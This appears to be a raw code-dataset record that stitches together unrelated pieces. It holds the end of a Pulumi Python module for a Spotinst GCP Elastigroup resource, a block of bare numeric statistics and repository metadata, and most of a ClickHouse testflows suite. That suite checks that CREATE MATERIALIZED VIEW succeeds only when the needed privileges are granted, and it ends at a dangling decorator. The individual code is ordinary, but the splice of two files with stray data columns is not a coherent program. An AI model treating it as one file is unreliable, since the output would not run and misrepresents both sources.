* `aliasIpRanges` (`pulumi.Input[list]`)
* `ipCidrRange` (`pulumi.Input[str]`)
* `subnetworkRangeName` (`pulumi.Input[str]`)
* `network` (`pulumi.Input[str]`)
The **scaling_down_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scaling_up_policies** object supports the following:
* `actionType` (`pulumi.Input[str]`)
* `adjustment` (`pulumi.Input[float]`)
* `cooldown` (`pulumi.Input[float]`)
* `dimensions` (`pulumi.Input[list]`)
* `name` (`pulumi.Input[str]`) - The group name.
* `value` (`pulumi.Input[str]`) - Labels value.
* `evaluationPeriods` (`pulumi.Input[float]`)
* `metricName` (`pulumi.Input[str]`)
* `namespace` (`pulumi.Input[str]`)
* `operator` (`pulumi.Input[str]`)
* `period` (`pulumi.Input[float]`)
* `policyName` (`pulumi.Input[str]`)
* `source` (`pulumi.Input[str]`)
* `statistic` (`pulumi.Input[str]`)
* `threshold` (`pulumi.Input[float]`)
* `unit` (`pulumi.Input[str]`)
The **scheduled_tasks** object supports the following:
* `cronExpression` (`pulumi.Input[str]`)
* `isEnabled` (`pulumi.Input[bool]`)
* `maxCapacity` (`pulumi.Input[str]`)
* `minCapacity` (`pulumi.Input[str]`)
* `targetCapacity` (`pulumi.Input[str]`)
* `taskType` (`pulumi.Input[str]`)
The **subnets** object supports the following:
* `region` (`pulumi.Input[str]`) - The region for the group of subnets.
* `subnetNames` (`pulumi.Input[list]`) - The names of the subnets in the region.
> This content is derived from https://github.com/terraform-providers/terraform-provider-spotinst/blob/master/website/docs/r/elastigroup_gcp.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["auto_healing"] = auto_healing
__props__["availability_zones"] = availability_zones
__props__["backend_services"] = backend_services
__props__["description"] = description
__props__["desired_capacity"] = desired_capacity
__props__["disks"] = disks
__props__["draining_timeout"] = draining_timeout
__props__["fallback_to_ondemand"] = fallback_to_ondemand
__props__["gpu"] = gpu
__props__["health_check_grace_period"] = health_check_grace_period
__props__["health_check_type"] = health_check_type
__props__["instance_types_customs"] = instance_types_customs
__props__["instance_types_ondemand"] = instance_types_ondemand
__props__["instance_types_preemptibles"] = instance_types_preemptibles
__props__["integration_docker_swarm"] = integration_docker_swarm
__props__["integration_gke"] = integration_gke
__props__["ip_forwarding"] = ip_forwarding
__props__["labels"] = labels
__props__["max_size"] = max_size
__props__["metadatas"] = metadatas
__props__["min_size"] = min_size
__props__["name"] = name
__props__["network_interfaces"] = network_interfaces
__props__["ondemand_count"] = ondemand_count
__props__["preemptible_percentage"] = preemptible_percentage
__props__["scaling_down_policies"] = scaling_down_policies
__props__["scaling_up_policies"] = scaling_up_policies
__props__["scheduled_tasks"] = scheduled_tasks
__props__["service_account"] = service_account
__props__["shutdown_script"] = shutdown_script
__props__["startup_script"] = startup_script
__props__["subnets"] = subnets
__props__["tags"] = tags
__props__["unhealthy_duration"] = unhealthy_duration
return Elastigroup(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 52.289474
| 837
| 0.642174
| 3,330
| 29,805
| 5.532432
| 0.102703
| 0.128969
| 0.089671
| 0.036693
| 0.875047
| 0.86582
| 0.862129
| 0.860283
| 0.856592
| 0.850404
| 0
| 0.00031
| 0.242208
| 29,805
| 569
| 838
| 52.381371
| 0.815372
| 0.525147
| 0
| 0.014085
| 1
| 0
| 0.153218
| 0.041839
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0.007042
| 0.042254
| 0.014085
| 0.338028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6aedbd18c7a8ab92fafc990f678ebc13d8633de4
| 141,998
|
py
|
Python
|
tests/testflows/rbac/tests/views/materialized_view.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 1
|
2022-02-27T15:21:20.000Z
|
2022-02-27T15:21:20.000Z
|
tests/testflows/rbac/tests/views/materialized_view.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | 16
|
2022-02-14T15:53:29.000Z
|
2022-03-25T18:39:16.000Z
|
tests/testflows/rbac/tests/views/materialized_view.py
|
chalice19/ClickHouse
|
2f38e7bc5c2113935ab86260439bb543a1737291
|
[
"Apache-2.0"
] | null | null | null |
from testflows.core import *
from testflows.asserts import error
from rbac.requirements import *
from rbac.helper.common import *
import rbac.helper.errors as errors
@contextmanager
def allow_experimental_alter_materialized_view_structure(node):
setting = ("allow_experimental_alter_materialized_view_structure", 1)
default_query_settings = None
try:
with Given(
"I add allow_experimental_alter_materialized_view_structure to the default query settings"
):
default_query_settings = getsattr(
current().context, "default_query_settings", []
)
default_query_settings.append(setting)
yield
finally:
with Finally(
"I remove allow_experimental_alter_materialized_view_structure from the default query settings"
):
if default_query_settings:
try:
default_query_settings.pop(default_query_settings.index(setting))
except ValueError:
pass
@TestSuite
@Requirements(
RQ_SRS_006_RBAC_MaterializedView_Create("1.0"),
)
def create(self, node=None):
"""Test the RBAC functionality of the `CREATE MATERIALIZED VIEW` command."""
Scenario(
run=create_without_create_view_privilege, setup=instrument_clickhouse_server_log
)
Scenario(
run=create_with_create_view_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_revoked_create_view_privilege_revoked_directly_or_from_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_without_source_table_privilege,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_source_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_subquery_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_join_query_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_union_query_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_join_union_subquery_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_nested_views_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_target_table_privilege_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_populate_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
Scenario(
run=create_with_populate_source_table_privilege_granted_directly_or_via_role,
setup=instrument_clickhouse_server_log,
)
@TestScenario
def create_without_create_view_privilege(self, node=None):
"""Check that user is unable to create a view without CREATE VIEW privilege."""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
with When("I try to create a view without CREATE VIEW privilege as the user"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
@TestScenario
def create_with_create_view_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view with CREATE VIEW privilege, either granted directly or through a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_create_view_privilege,
name="create with create view privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_create_view_privilege,
name="create with create view privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_create_view_privilege(self, grant_target_name, user_name, node=None):
"""Check that user is able to create a view with the granted privileges."""
view_name = f"view_{getuid()}"
if node is None:
node = self.context.node
try:
with When("I grant the CREATE VIEW privilege"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I try to create a view without privilege as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1",
settings=[("user", f"{user_name}")],
)
finally:
with Then("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_revoked_create_view_privilege_revoked_directly_or_from_role(
self, node=None
):
"""Check that user is unable to create view after the CREATE VIEW privilege is revoked, either directly or from a role."""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_revoked_create_view_privilege,
name="create with create view privilege revoked directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_revoked_create_view_privilege,
name="create with create view privilege revoked from a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_revoked_create_view_privilege(
self, grant_target_name, user_name, node=None
):
"""Revoke CREATE VIEW privilege and check the user is unable to create a view."""
view_name = f"view_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with And("I revoke CREATE VIEW privilege"):
node.query(f"REVOKE CREATE VIEW ON {view_name} FROM {grant_target_name}")
with Then("I try to create a view on the table as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
@TestScenario
def create_without_source_table_privilege(self, node=None):
"""Check that user is unable to create a view without select
privilege on the source table.
"""
user_name = f"user_{getuid()}"
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
with user(node, f"{user_name}"):
with When("I grant CREATE VIEW privilege to a user"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {user_name}")
with Then("I try to create a view without select privilege on the table"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
@TestScenario
def create_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
"""Check that a user is able to create a view if and only if the user has create view privilege and
select privilege on the source table, either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_source_table_privilege,
name="create with create view and select privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_source_table_privilege,
name="create with create view and select privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_source_table_privilege(self, user_name, grant_target_name, node=None):
"""Check that user is unable to create a view without SELECT privilege on the source table."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with And("I grant SELECT privilege"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with And("I try to create a view on the table as the user"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
node.query(
f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}",
settings=[("user", f"{user_name}")],
)
with Then("I check the view"):
output = node.query(f"SELECT count(*) FROM {view_name}").output
assert output == "0", error()
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view where the stored query has two subqueries
if and only if the user has SELECT privilege on all of the tables,
either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_subquery,
name="create with subquery, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_subquery,
name="create with subquery, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_subquery(self, user_name, grant_target_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to CREATE VIEW as the user with create privilege"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=3):
with grant_select_on_table(
node,
permutation,
grant_target_name,
table0_name,
table1_name,
table2_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=3)) + 1,
grant_target_name,
table0_name,
table1_name,
table2_name,
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view where the stored query includes a `JOIN` statement
if and only if the user has SELECT privilege on all of the tables,
either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_join_query,
name="create with join query, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_join_query,
name="create with join query, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_query(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} JOIN {table1_name} USING d"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=2):
with grant_select_on_table(
node, permutation, grant_target_name, table0_name, table1_name
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=2)) + 1,
grant_target_name,
table0_name,
table1_name,
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Then("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view where the stored query includes a `UNION ALL` statement
if and only if the user has SELECT privilege on all of the tables,
either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_union_query,
name="create with union query, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_union_query,
name="create with union query, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_union_query(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=2):
with grant_select_on_table(
node, permutation, grant_target_name, table0_name, table1_name
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=2)) + 1,
grant_target_name,
table0_name,
table1_name,
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_join_union_subquery_privilege_granted_directly_or_via_role(
self, node=None
):
"""Check that user is able to create a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
if and only if the user has SELECT privilege on all of the tables, either granted directly or through a role.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_join_union_subquery,
name="create with join union subquery, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_join_union_subquery,
name="create with join union subquery, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_join_union_subquery(self, grant_target_name, user_name, node=None):
"""Grant select and create view privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view_name = f"view_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
table4_name = f"table4_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
if node is None:
node = self.context.node
with table(
node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"
):
with user(node, f"{user_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(
f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}"
)
with Then(
"I attempt to create view as the user with CREATE VIEW privilege"
):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
table3_name=table3_name,
table4_name=table4_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in permutations(table_count=5):
with grant_select_on_table(
node,
permutation,
grant_target_name,
table0_name,
table1_name,
table3_name,
table4_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
table3_name=table3_name,
table4_name=table4_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all tables"):
with grant_select_on_table(
node,
max(permutations(table_count=5)) + 1,
grant_target_name,
table0_name,
table1_name,
table2_name,
table3_name,
table4_name,
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view_name=view_name,
table0_name=table0_name,
table1_name=table1_name,
table2_name=table2_name,
table3_name=table3_name,
table4_name=table4_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def create_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
"""Check that user is able to create a view with a stored query that includes other views if and only if
they have SELECT privilege on all the views and the source tables for those views.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_nested_views,
name="create with nested views, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_nested_views,
name="create with nested views, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_nested_views(self, grant_target_name, user_name, node=None):
"""Grant SELECT and CREATE VIEW privileges and check that user is able to create a view
if and only if they have all necessary privileges.
"""
view0_name = f"view0_{getuid()}"
view1_name = f"view1_{getuid()}"
view2_name = f"view2_{getuid()}"
view3_name = f"view3_{getuid()}"
table0_name = f"table0_{getuid()}"
table1_name = f"table1_{getuid()}"
table2_name = f"table2_{getuid()}"
table3_name = f"table3_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
create_view_query = "CREATE MATERIALIZED VIEW {view3_name} ENGINE = Memory AS SELECT y FROM {table3_name} UNION ALL SELECT y FROM {view2_name}"
if node is None:
node = self.context.node
with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
try:
with Given("I have some views"):
node.query(
f"CREATE MATERIALIZED VIEW {view0_name} ENGINE = Memory AS SELECT y FROM {table0_name}"
)
node.query(
f"CREATE MATERIALIZED VIEW {view1_name} ENGINE = Memory AS SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {view0_name} WHERE y<2)"
)
node.query(
f"CREATE MATERIALIZED VIEW {view2_name} ENGINE = Memory AS SELECT y FROM {table2_name} JOIN {view1_name} USING y"
)
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view3_name} TO {grant_target_name}")
with Then(
"I attempt to create view as the user with CREATE VIEW privilege"
):
node.query(
create_view_query.format(
view3_name=view3_name,
view2_name=view2_name,
table3_name=table3_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
for permutation in (
[0, 1, 2, 3, 7, 11, 15, 31, 39, 79, 95],
permutations(table_count=7),
)[self.context.stress]:
with grant_select_on_table(
node,
permutation,
grant_target_name,
view2_name,
table3_name,
view1_name,
table2_name,
view0_name,
table1_name,
table0_name,
) as tables_granted:
with When(
f"permutation={permutation}, tables granted = {tables_granted}"
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view3_name=view3_name,
view2_name=view2_name,
table3_name=table3_name,
),
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant select on all views"):
with grant_select_on_table(
node,
max(permutations(table_count=7)) + 1,
grant_target_name,
view0_name,
view1_name,
view2_name,
table0_name,
table1_name,
table2_name,
table3_name,
):
with Given("I don't have a view"):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with Then("I attempt to create a view as the user"):
node.query(
create_view_query.format(
view3_name=view3_name,
view2_name=view2_name,
table3_name=table3_name,
),
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the views"):
with When("I drop view0", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view3_name}")
with And("I drop view1", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view2_name}")
with And("I drop view2", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view1_name}")
with And("I drop view3", flags=TE):
node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestScenario
def create_with_target_table_privilege_directly_or_via_role(self, node=None):
"""Check that user is able to create a materialized view with a target table if and only if
the user has CREATE VIEW privilege and SELECT and INSERT privileges on the target table.
"""
user_name = f"user_{getuid()}"
role_name = f"role_{getuid()}"
if node is None:
node = self.context.node
with user(node, f"{user_name}"):
Scenario(
test=create_with_target_table,
name="create with target table, privilege granted directly",
)(grant_target_name=user_name, user_name=user_name)
with user(node, f"{user_name}"), role(node, f"{role_name}"):
with When("I grant the role to the user"):
node.query(f"GRANT {role_name} TO {user_name}")
Scenario(
test=create_with_target_table,
name="create with target table, privilege granted through a role",
)(grant_target_name=role_name, user_name=user_name)
@TestOutline
def create_with_target_table(self, grant_target_name, user_name, node=None):
"""Check that user is unable to create a view without INSERT and SELECT privileges and is able to once both are granted."""
view_name = f"view_{getuid()}"
table_name = f"table_{getuid()}"
exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
if node is None:
node = self.context.node
with table(node, f"{table_name}"):
try:
with When("I grant CREATE VIEW privilege"):
node.query(f"GRANT CREATE VIEW ON {view_name} TO {grant_target_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT on the target table"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I revoke SELECT on the target table"):
node.query(f"REVOKE SELECT ON {table_name} FROM {grant_target_name}")
with And("I grant INSERT privilege on the target table"):
node.query(f"GRANT INSERT ON {table_name} TO {grant_target_name}")
with Then("I attempt to create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
settings=[("user", f"{user_name}")],
exitcode=exitcode,
message=message,
)
with When("I grant SELECT on the target table"):
node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
with Then("I successfully create a view as the user"):
node.query(
f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1",
settings=[("user", f"{user_name}")],
)
finally:
with Finally("I drop the view"):
node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
